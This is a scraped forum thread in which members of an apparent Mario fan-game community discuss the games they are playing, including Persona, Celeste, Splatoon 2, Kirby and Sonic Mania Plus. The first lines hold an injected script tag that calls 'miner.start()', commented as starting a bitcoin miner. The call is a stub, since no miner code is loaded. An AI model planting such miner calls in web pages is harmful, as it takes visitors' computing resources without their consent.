<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitysmw central

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Bean

Re: What games are you playing?

Postby Bean » 2 months ago

Trying to finish Kirby's Blowout Blast since it's another short one, yet I keep only playing the game for 15-20 minutes at a time. Go figure.

warpio

Postby warpio » 2 months ago

Bean wrote: Trying to finish Kirby's Blowout Blast since it's another short one, yet I keep only playing the game for 15-20 minutes at a time. Go figure.
If you go for all platinum scores that game gets pretty intense. It becomes more like a puzzle game where you have to figure out how to maximize your score in every situation. If you just care about beating it, it can be over in like an hour.

Bean

warpio wrote: If you go for all platinum scores that game gets pretty intense. It becomes more like a puzzle game where you have to figure out how to maximize your score in every situation. If you just care about beating it, it can be over in like an hour.
Been going for all golds since that unlocks their EX stages. I figure that's good enough for my level of skill. I don't do challenge runs as much as I used to!

Ashan
The world has become a place
First name: Hayden

Postby Ashan » 2 months ago

Finally got around to playing Celeste. Been having a ton of fun so far!

HatKid
Pronouns: she/her

Postby HatKid » 2 months ago

Finally got around to finishing up Persona 4. I liked it but not one of my favorites.
Picked up Legend of Heroes: A Tear of Vermilion again and played it a little. Not a big fan of it but it doesn't seem like too terribly long of a game so I might just try to fly through it

Alice
💙
Pronouns: Girl person

Postby Alice » 2 months ago

HatKid wrote: Finally got around to finishing up Persona 4. I liked it but not one of my favorites.
I thought the characters were generally more likable than Persona 3's. There were a handful of game mechanic changes from P3 that were definitely a good choice too. I though the Dark Hour was more interesting than the Midnight Channel though. Can't say anything on P5 yet though since I don't have a Playstation to play it. (Hopefully the rumors of it getting a pc port are true.)

HatKid

Alice wrote: P5 ... (Hopefully the rumors of it getting a pc port are true.)
I thought P5 was good. I mostly liked the music but some tracks seemed like they were missing something to make them more interesting. I didn't quite get through all the Confidants but they weren't terrible. The palaces were not too terrible except for right at the end where the last 2ish felt really long and boring. The items and equipment are a bit expensive for the amount of money you get from battles... Unless I just didn't battle enough because I usually am quite underleveled in RPGs. A PC port would be great :D

Alice
💙

Postby Alice » 2 months ago

HatKid wrote: I thought P5 was good. I mostly liked the music but some tracks seemed like they were missing something to make them more interesting.
I mostly don't recall P4's soundtrack but P3's was one of my favorite video game soundtracks. Especially the ones during the final two battles.
The items and equipment are a bit expensive for the amount of money you get from battles... Unless I just didn't battle enough because I usually am quite underleveled in RPGs.
I know the feeling there, lol. I'm not a big fan of grinding so I tend to be massively underlevelled myself. When I beat P3 my highest level character was only level 70 or 71. Most guides tend to recommend level 73-75 for all characters.

I actually reached it around level 63-64 instead but just couldn't beat it so I ended up going on a quest for some good personas and a few levels along the way. (Which was still a fairly high level for me in an rpg all things considered.) Ended up mostly using Mithra who I used all the stat boosting cards I'd gotten throughout the game on so it ended up with 99 in every stat except luck and then fell back to Surt for times when I needed fire. (My Mithra had the three other elements and Megidola. I also had Loki for light and dark iirc though I never really used him.)

Levels ended up being less of an issue for me in P4 due to a rather extended quest to obtain the Alice persona. Turned out to be an enormous pain in the butt so by the time I got to the end of the game my party was already at a good level.

HatKid

Alice wrote: I mostly don't recall P4's soundtrack but P3's was one of my favorite video game soundtracks.

I'm not a big fan of grinding so I tend to be massively underlevelled myself. When I beat P3 my highest level character was only level 70 or 71.
I only liked a few tracks from Persona 4. Most of its soundtrack just didn't appeal to me. However P3's OST and also P1 and 2's OSTs are some of my favorites.

I had to have some grinding sessions in P4 because I was like 10 levels lower than the recommended level for the dungeon boss. When I played P3P, I got to the final boss with my character at level 80 and the rest of my party at like 72ish. Part of the level discrepancy might be because I like to evenly level all party members and because I went hunting for those stupid gold shadows so I could get their medal things but they hardly ever appeared :cry:. When I played FES, I think everyone was around level 73. I guess I wasn't really underleveled in P3.
When I tackled the final dungeon in P1 PSP, I was like 10 levels lower than I probably should have been because the boss kicked my butt to the moon and back but I at least could expedite the grind with cheats. However in P1 PS1 I was pretty much screwed because I couldn't get any exp cheats to work and I didn't wanna just use infinite hp cheats so I had to suck it up and grind out 20 or so levels. Never again.

Bean

Took a very short break from recording a project to finally do the last set of stages on the normal route in Kirby's Blowout Blast. Got all golds in those, too, so I guess I'll be doing the EX stages next time I play. Took around two months to play this game for a little under two hours to get to that point, but it's still fun enough for what it is. Oops!

Parama

Postby Parama » 2 months ago

been mostly just playing a lot of celeste to do the golden strawberries, because i'm an idiot but i'm at 194/200, so... something's going right somewhere
If I was suffering, I’d cut the ties that were never meant to bind.

Celeste Golden Strawberry Challenge (Spoilers):

Bean

20XX came out on the Switch yesterday. Think I'm going to play some co-op on it a little later and see how it goes.

And it went well! Game's got some style and a heaping helping of difficulty to go along with it thanks to some procedurally generated levels. Keeps things interesting since you only get three tries before you go all the way back to the start, but you can buy upgrades for another run if you're feeling up to it after losing.

SAJewers
hi

Postby SAJewers » 2 months ago

So i managed to beat the final boss in Rain Project, but got kaizo'd during the cutscene as it was still in the process of doing a final attack. :/

*screams*

EDIT: having said that, i'm calling the game beaten. Maybe one the next patch is out i'll re-beat it
Last edited by SAJewers on 12 Jul 2018, 14:15, edited 1 time in total.
ImageImageImageImage
ImageImageImageImage

underFlo
you spinda right round
First name: Florence

Postby underFlo » 2 months ago

gettin' into Splatoon 2 again, such a fun game.
ImageImageImageImageImageImage

warpio

Postby warpio » 2 months ago

Spinda wrote: gettin' into Splatoon 2 again, such a fun game.
Same here. I'm still not done with the Octo Expansion since I want to go for the extra challenge of beating every stage with every available weapon, but I'm also getting more into the Ranked mode now since I found out the Splosher Machine is a really good weapon.

Other than that, I've also been replaying Kirby & the Amazing Mirror, because I've only played through it once over a decade ago and I've forgotten about most of it since then. It's really interesting once you get the hang of how the map system works... and I like how despite being a Metroidvania game with multiple transitions between areas, you can pretty much fully 100% each Area in the game before moving onto the next and just treat each Area as its own self-contained maze level.

Bean

Haven't had much time to play games lately, but I picked up Octopath Traveler last weekend.

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 2 months ago

Started Donkey Kong Country: Tropical Freeze last Sunday. Been playing 1 world/day after work, so tonight I plan on starting and finishing World 5, assuming the difficulty doesn't ramp up significantly over World 4's swimming shenanigans. Loving the look and feel of the whole game, but still never quite as comfortable with DK's basic movement (without Dixie) as I feel I should be. Always lose a few lives to really simple mistakes every checkpoint.

Oh, and I'm playing the Switch version in Original Mode (no Funk here)
BOB is an acronym for BOB is Only BOB etc.

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 2 months ago

Sonic Mania Plus is good. Real good. Still getting a hang of Ray despite 100%ing as him, and Mighty is amusingly broken.
Also, the new Metal Sonic boss: it's an improvement, but wow is it easy to just fall off and die out of nowhere.
Still have yet to Encore. I might do it after I beat the game as Mighty, or I might wait til I've beaten the other 3 characters again.

Kirby Star Allies is a thing, too. Not bad, but very Nintendo formula. Not even Kirby formula at this point (that was Return to Dreamland, which I loved the few times I got to play it) - It feels similar to New Super Mario Bros almost.

BobisOnlyBob
Mythical Quadruped

100% Finished DKC: Tropical Freeze today! Started last Sunday, finished today - and barely played yesterday - that makes this a One Week Kong Quest Completed!

Bought Sonic Mania Plus but probably will hold off on that, too much platformer for now. Might go back Into The Breach or might pick something random from my excessive library.

Bean

Felt like playing Symphony of the Night again since it's been a long time since I have. This time, I'm going with the PSP version for the different dub. Just wanted to hear how it played out.

BobisOnlyBob
Mythical Quadruped

100% Achievements on Into The Breach! Shifting that onto the 'replayable' list and now looking for something new to play...

Also Copy Kitty added two new Beta Achievements, breaking my perfect 100% on that, again! :x Oh well, guess I'll have to play it when it updates ~

BurntTenda
defeat four ducks
Pronouns: he/him/his

Postby BurntTenda » 1 month ago

I picked up MGSV: Definitive Edition.
The Phantom Pain is pretty fun, and I like how sandboxy the missions are.
It doesn't feel quite like a Metal Gear game, but I enjoy it still.
Something goes here sometime.

Alice
💙

Postby Alice » 1 month ago

Been playing Ys: Memories of Celceta. It's interesting to finally see some of Adol's past from before he became an adventurer. Oh, and the game's pretty good too. The upgrading system is fairly different from other Ys games but not necessarily in a bad way. My only complaint about it is that the basic type of upgrade for weapons/armor makes them do more damage/defend against more damage but other than the upgrade rating for that type ranging from 0-9 it doesn't actually reflect exactly how much of an improvement it is which makes it a bit difficult to tell if a new un-upgraded item is better than your current upgraded one just because it has higher stats.

Bean

Postby Bean » 1 month ago

And the PSP version of Symphony of the Night is beaten. Got all three endings along the way since I forgot the best one's tied to map completion percentage. Kind of glad about that. Still one of the best in the series. Mm-hmm.

Ashan
The world has become a place
First name: Hayden

Postby Ashan » 1 month ago

Ended up impulse buying Mega Man X Legacy Collection for Switch, and hopped straight into Mega Man X4 because I've never played anything beyond X3 before. I'm playing with Zero who I assume is more the easy mode because his sword is pretty damn strong? It's been a lot of fun though. Managed to find all the heart containers, 2 subtanks, and I guess a weapon energy tank(?) without really trying.

It's not 100% blind because raocow did play it not too long ago but I kinda only passively watch those videos and don't remember much (didn't remember any boss weaknesses, especially since the abilities Zero gains are so different from typical boss weapons).
For context to how little I know about this game -- just last night while I was in the stage for my second to last maverick I tapped jump in the air and suddenly realized I had gained a double jump at some point. I literally didn't realize that I had that ability, I'm not sure if it came with the air dash or what but it would have been helpful on plenty of occasions.

Return to “the cartridgé”